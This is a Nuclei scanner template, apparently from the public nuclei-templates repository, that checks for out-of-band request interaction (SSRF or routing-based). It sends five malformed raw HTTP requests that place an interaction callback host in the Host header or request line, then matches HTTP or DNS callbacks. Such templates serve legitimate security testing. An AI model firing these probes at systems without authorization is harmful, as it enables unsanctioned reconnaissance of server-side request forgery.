nuclei-templates/http/vulnerabilities/generic/request-based-interaction.yaml

60 lines
1.3 KiB
YAML

id: request-based-interaction
info:
name: OOB Request Based Interaction
author: pdteam
severity: info
description: The remote server fetched a spoofed DNS Name from the request.
reference:
- https://portswigger.net/research/cracking-the-lens-targeting-https-hidden-attack-surface
tags: oast,ssrf,generic
metadata:
max-request: 5
http:
- raw:
- |+
GET / HTTP/1.1
Host: {{interactsh-url}}
Cache-Control: no-transform
Accept: */*
- |+
GET / HTTP/1.1
Host: @{{interactsh-url}}
Cache-Control: no-transform
Accept: */*
- |+
GET http://{{interactsh-url}}/ HTTP/1.1
Host: {{Hostname}}
Cache-Control: no-transform
Accept: */*
- |+
GET @{{interactsh-url}}/ HTTP/1.1
Host: {{Hostname}}
Cache-Control: no-transform
Accept: */*
- |+
GET {{interactsh-url}}:80/ HTTP/1.1
Host: {{Hostname}}
Cache-Control: no-transform
Accept: */*
unsafe: true # Use Unsafe HTTP library for malformed HTTP requests.
matchers-condition: or
matchers:
- type: word
part: interactsh_protocol
name: http
words:
- "http"
- type: word
part: interactsh_protocol
name: dns
words:
- "dns"